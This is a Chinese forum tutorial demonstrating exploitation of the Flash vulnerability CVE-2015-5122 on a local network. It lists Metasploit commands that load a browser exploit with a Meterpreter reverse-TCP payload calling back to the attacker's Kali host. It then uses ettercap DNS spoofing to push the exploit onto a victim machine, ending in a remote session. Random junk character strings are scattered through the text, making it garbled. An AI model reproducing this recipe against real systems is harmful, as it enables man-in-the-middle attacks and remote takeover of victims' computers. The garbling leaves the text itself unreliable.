cve2015-5122漏洞实例演示虚拟机

admin · 发表于 2018-10-20 20:28:02

$ X4 n$ m4 E: i+ d 二、cve2015-5122漏洞实例演示虚拟机 7 [, a% i. L7 c3 B

4 p* ~- {8 U1 ?$ |( E6 H# q 关于cve2015-5122这个漏洞，大家可以百度一下，是关于flash的漏洞，是2015年flash漏洞的第二发，今天我们就用这个漏洞来演示，开启kai linux msfconsole命令启动msf如图： 4 k0 k7 F( K4 @9 @0 s

; t! |7 O5 j- w* T3 o) m+ S search cve-2015-5122如图： - ?3 H2 [/ D+ U+ H

1 c% h; S$ r1 Y+ ^: F1 E$ L & i! A; b; N& r t3 [7 Q( O: R) I

: A, ]4 o% e" N8 R* ^2 s l 下面我们敲如下命令： , f9 d F7 ~ k. \; L

& L- j( E: t2 s# X use exploit/multi/browser/adobe_flash_opaque_background_uaf 8 g2 }0 b, K1 f3 _$ Z

5 ~4 B [/ k7 u5 r! r: o: I5 \ set PAYLOAD windows/meterpreter/reverse_tcp P; t7 E2 h% Y$ q; b

9 o0 c, d( [; r2 E set LHOST 192.168.0.109 . s5 x- Z5 c2 t9 f. T& s4 P8 G

6 y0 s# [. K& K2 { set URIPATH / /*根目录*/ - V9 F# [2 u% C$ r/ ~) o7 @. I

$ N R6 \+ s/ l/ e6 t set SRVHOST 192.168.0.109 //192.168.0.109为kaili ip地址 4 v/ h* S+ m# S8 o$ ]! p

T6 z; A- ~- P# G set SRVPORT 80 /*80端口*/ 使用80端口时要保证apache为停止状态用service apache2 stop命令停止否则会提示端口被占用 4 _, ^0 o2 }* t1 ]; J- l

+ B) O/ L( x4 F: x 然后show options如图： ) Q5 Z- v! d1 S: {- S0 B( H

/ Q' j- ? |- P- k: H2 |4 \ ! l" V; y- w4 s, A8 `, U

6 b* J# A2 s- b& U/ u: e 一切都设置好了，执行exploit。下面我们进etc/ettercap目录下设置etc.dns如图：
5 c5 j6 b) e: d: [ ( b& U( b" L9 m. i0 j: D1 ]

c6 G/ d1 h9 J9 U H- |) a 然后ettercap -G命令打开ettercap，我们要攻击的主机ip是192.168.0。115 * A2 |9 e H! o% N

p, P" l8 V9 f R( X+ K Ettercap过程第一篇里已经演示，这里不在详细写了。。。执行完ettercap以后我们观察一下msf - a5 P. |* Y5 R+ ] \

2 O) r5 G7 |+ b9 ^5 m6 j2 i8 I . ~; l2 v0 E& Y

/ j/ s& ~+ @0 h$ x! Q! y9 O8 u 成功了，这时候我们断开ettercap，如图： , G2 y# F7 n+ a2 d; f/ j

4 `. x/ z: p$ \( Y; [ + p6 a! k" W0 C% U* y

8 {1 D! }2 E' ^, g+ ^8 [ Screenshot如图： ) X5 _. ^& b; X

8 c" T( U# r6 _* B( [) h / i2 P5 X2 S Z# i; d+ Y) F

% C/ \' t# _' j: }, x ! g3 }( Z" n# a+ ?9 p" N

		自动登录	找回密码
密码			立即注册